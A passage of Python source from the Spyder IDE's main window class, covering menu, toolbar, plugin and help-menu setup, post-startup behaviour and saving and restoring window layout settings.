self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
# Set Window title and icon
if DEV is not None:
title = "Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = "Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if DEBUG:
title += " [DEBUG MODE %d]" % DEBUG
if options.window_title is not None:
title += ' -- ' + options.window_title
self.base_title = title
self.update_window_title()
resample = os.name != 'nt'
icon = ima.icon('spyder', resample=resample)
# Resampling SVG icon only on non-Windows platforms (see Issue 1314):
self.setWindowIcon(icon)
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
debug_print("appusermodelid: " + str(res))
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.dockwidgets_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# Track which console plugin type had last focus
# True: Console plugin
# False: IPython console plugin
self.last_console_plugin_focus_was_python = True
# To keep track of the last focused widget
self.last_focused_widget = None
# Server to open external files on a single instance
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
self.apply_settings()
self.debug_print("End of MainWindow constructor")
def debug_print(self, message):
"""Debug prints"""
debug_print(message)
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def setup(self):
"""Setup main window"""
self.debug_print("*** Start of MainWindow setup ***")
self.debug_print(" ..core actions")
self.close_dockwidget_action = create_action(self,
icon=ima.icon('DialogCloseButton'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_dockwidgets_action = create_action(self, _("Lock panes"),
toggled=self.toggle_lock_dockwidgets,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_dockwidgets_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
self.debug_print(" ..toolbars")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
self.debug_print(" ..tools")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
update_modules_action = create_action(self,
_("Update module names list"),
triggered=lambda:
module_completion.reset(),
tip=_("Refresh list of module names "
"available in PYTHONPATH"))
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [reset_spyder_action, None,
update_modules_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# Python(x,y) launcher
self.xy_action = create_action(self,
_("Python(x,y) launcher"),
icon=get_icon('pythonxy.png'),
triggered=lambda:
programs.run_python_script('xy', 'xyhome'))
if os.name == 'nt' and is_module_installed('xy'):
self.external_tools_menu_actions.append(self.xy_action)
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"),
name, 'qtdesigner.png')
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"),
"linguist", 'qtlinguist.png')
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
qteact = create_python_script_action(self,
_("Qt examples"), 'qt.png', "PyQt4",
osp.join("examples", "demos",
"qtdemo", "qtdemo"), args)
for act in (qtdact, qtlact, qteact):
if act:
additact.append(act)
if additact and (is_module_installed('winpython') or \
is_module_installed('xy')):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
self.debug_print(" ..sift?")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except (ImportError, AssertionError):
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except (ImportError, AssertionError):
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# ViTables
vitables_act = create_program_action(self, _("ViTables"),
"vitables", 'vitables.png')
if vitables_act:
self.external_tools_menu_actions += [None, vitables_act]
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
self.debug_print(" ..plugin: internal console")
from spyder.plugins.console import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Working directory plugin
self.debug_print(" ..plugin: working directory")
from spyder.plugins.workingdirectory import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
self.toolbarslist.append(self.workingdirectory)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help import Help
self.help = Help(self)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer import OutlineExplorer
fullpath_sorting = CONF.get('editor', 'fullpath_sorting', True)
self.outlineexplorer = OutlineExplorer(self,
fullpath_sorting=fullpath_sorting)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [None, restart_action, quit_action]
self.set_splash("")
self.debug_print(" ..widgets")
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
if CONF.get('project_explorer', 'enable'):
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# External console
self.set_splash(_("Loading external console..."))
from spyder.plugins.externalconsole import ExternalConsole
self.extconsole = ExternalConsole(self, light_mode=False)
self.extconsole.register_plugin()
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# IPython console
if QTCONSOLE_INSTALLED:
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole import IPythonConsole
self.ipyconsole = IPythonConsole(self)
self.ipyconsole.register_plugin()
nsb = self.variableexplorer.add_shellwidget(self.console.shell)
self.console.shell.refresh.connect(nsb.refresh_table)
nsb.auto_refresh_button.setEnabled(False)
self.set_splash(_("Setting up main window..."))
# Help menu
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
doc_path = get_module_data_path('spyder', relpath="doc",
attr_name='DOCPATH')
# * Trying to find the chm doc
spyder_doc = osp.join(doc_path, "Spyderdoc.chm")
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(doc_path, os.pardir, "Spyderdoc.chm")
# * Trying to find the html doc
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(doc_path, "index.html")
# * Trying to find the development-version html doc
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(get_module_source_path('spyder'),
os.pardir, 'build', 'lib', 'spyder',
'doc', "index.html")
# * If we totally fail, point to our web build
if not osp.isfile(spyder_doc):
spyder_doc = 'http://pythonhosted.org/spyder'
else:
spyder_doc = file_uri(spyder_doc)
doc_action = create_action( self, _("Spyder documentation"), shortcut="F1",
icon=ima.icon('DialogHelpButton'),
triggered=lambda : programs.start_file(spyder_doc))
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"))
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finish
# 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
if not DEV:
self.tours_menu = None
self.help_menu_actions = [doc_action, tut_action, self.tours_menu,
None, report_action, dep_action,
self.check_updates_action, support_action,
None]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.ipyconsole is not None and self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Documentation provided by Python(x,y), if available
try:
from xy.config import DOC_PATH as xy_doc_path
xydoc = osp.join(xy_doc_path, "Libraries")
def add_xydoc(text, pathlist):
for path in pathlist:
if osp.exists(path):
add_ipm_action(text, path)
break
add_xydoc(_("Python(x,y) documentation folder"),
[xy_doc_path])
add_xydoc(_("IPython documentation"),
[osp.join(xydoc, "IPython", "ipythondoc.chm")])
add_xydoc(_("guidata documentation"),
[osp.join(xydoc, "guidata", "guidatadoc.chm"),
r"D:\Python\guidata\build\doc_chm\guidatadoc.chm"])
add_xydoc(_("guiqwt documentation"),
[osp.join(xydoc, "guiqwt", "guiqwtdoc.chm"),
r"D:\Python\guiqwt\build\doc_chm\guiqwtdoc.chm"])
add_xydoc(_("Matplotlib documentation"),
[osp.join(xydoc, "matplotlib", "Matplotlibdoc.chm"),
osp.join(xydoc, "matplotlib", "Matplotlib.pdf")])
add_xydoc(_("NumPy documentation"),
[osp.join(xydoc, "NumPy", "numpy.chm")])
add_xydoc(_("NumPy reference guide"),
[osp.join(xydoc, "NumPy", "numpy-ref.pdf")])
add_xydoc(_("NumPy user guide"),
[osp.join(xydoc, "NumPy", "numpy-user.pdf")])
add_xydoc(_("SciPy documentation"),
[osp.join(xydoc, "SciPy", "scipy.chm"),
osp.join(xydoc, "SciPy", "scipy-ref.pdf")])
except (ImportError, KeyError, RuntimeError):
pass
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"))
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [None, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# Third-party plugins
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
#----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_dockwidgets_action,
self.close_dockwidget_action,
self.maximize_action,
None))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (None,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
None,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (None, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
self.debug_print("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'search', 'source', 'run', 'debug',
'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
child.aboutToShow.connect(self.update_edit_menu)
self.debug_print("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
self.restore_scrollbar_position.emit()
# Remove our temporary dir
atexit.register(self.remove_tmpdir)
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# In MacOS X 10.7 our app is not displayed after initialized (I don't
# know why because this doesn't happen when started from the terminal),
# so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if CONF.get('main', 'single_instance') and not self.new_instance:
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emmited by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
self.extconsole.setMinimumHeight(0)
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status of dockidgets (panes)
self.lock_dockwidgets_action.setChecked(self.dockwidgets_locked)
self.apply_panes_settings()
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = []
if self.help is not None:
plugins_to_show.append(self.help)
if self.ipyconsole is not None:
if self.ipyconsole.isvisible:
plugins_to_show += [self.extconsole, self.ipyconsole]
else:
plugins_to_show += [self.ipyconsole, self.extconsole]
else:
plugins_to_show += [self.extconsole]
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
ipy_visible = self.ipyconsole is not None and self.ipyconsole.isvisible
if not self.extconsole.isvisible and not ipy_visible:
self.historylog.add_history(get_conf_path('history.py'))
# Load last openned project (if a project was active when spyder closed)
if self.projects is not None:
self.projects.reopen_last_project()
# Give focus to the Editor setup opened files
if self.editor.dockwidget.isVisible():
# Load files
self.editor.setup_open_files()
try:
self.editor.get_focus_widget().setFocus()
except AttributeError:
pass
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates()
self.report_missing_dependencies()
self.is_setting_up = False
def update_window_title(self):
"""Update main spyder window title based on projects."""
title = self.base_title
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), '~')
title = '{0} - {1}'.format(path, title)
self.setWindowTitle(title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main'):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
qba = self.saveState()
CONF.set(section, prefix+'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
